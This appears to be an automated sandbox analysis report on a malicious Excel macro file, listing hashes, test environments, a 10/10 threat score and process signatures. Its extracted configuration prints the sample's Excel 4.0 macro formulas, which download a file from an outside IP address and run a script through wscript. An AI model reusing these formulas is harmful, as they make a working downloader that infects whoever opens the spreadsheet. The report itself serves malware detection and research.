General
-
Target
65416c0156cec156f4e9433e012e25a0
-
Size
6KB
-
Sample
231222-e75vnsdgfr
-
MD5
65416c0156cec156f4e9433e012e25a0
-
SHA1
d7d48fcbf71da4cbe58ed2fa7c75c1aaf3934609
-
SHA256
6bc103a175374278b29a9ffe9a3039508ee0977af4d4146b3c8c68a0a17bed35
-
SHA512
864d12d1683d2a67e34d6c5657c3f8fa0ca337e140334dc438e7a54bc00b79699651a113aff0908d22e805831f6d390edeaa6691d94ab0f4d20c4cfab25dfc77
-
SSDEEP
192:NDS1uSbbrA2OmmfR68UhHFBFYukb98y/H+e7d:NCukM2wc1FY5b98y//
Static task
static1
Behavioral task
behavioral1
Sample
65416c0156cec156f4e9433e012e25a0.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
65416c0156cec156f4e9433e012e25a0.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
65416c0156cec156f4e9433e012e25a0
-
Size
6KB
-
MD5
65416c0156cec156f4e9433e012e25a0
-
SHA1
d7d48fcbf71da4cbe58ed2fa7c75c1aaf3934609
-
SHA256
6bc103a175374278b29a9ffe9a3039508ee0977af4d4146b3c8c68a0a17bed35
-
SHA512
864d12d1683d2a67e34d6c5657c3f8fa0ca337e140334dc438e7a54bc00b79699651a113aff0908d22e805831f6d390edeaa6691d94ab0f4d20c4cfab25dfc77
-
SSDEEP
192:NDS1uSbbrA2OmmfR68UhHFBFYukb98y/H+e7d:NCukM2wc1FY5b98y//
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-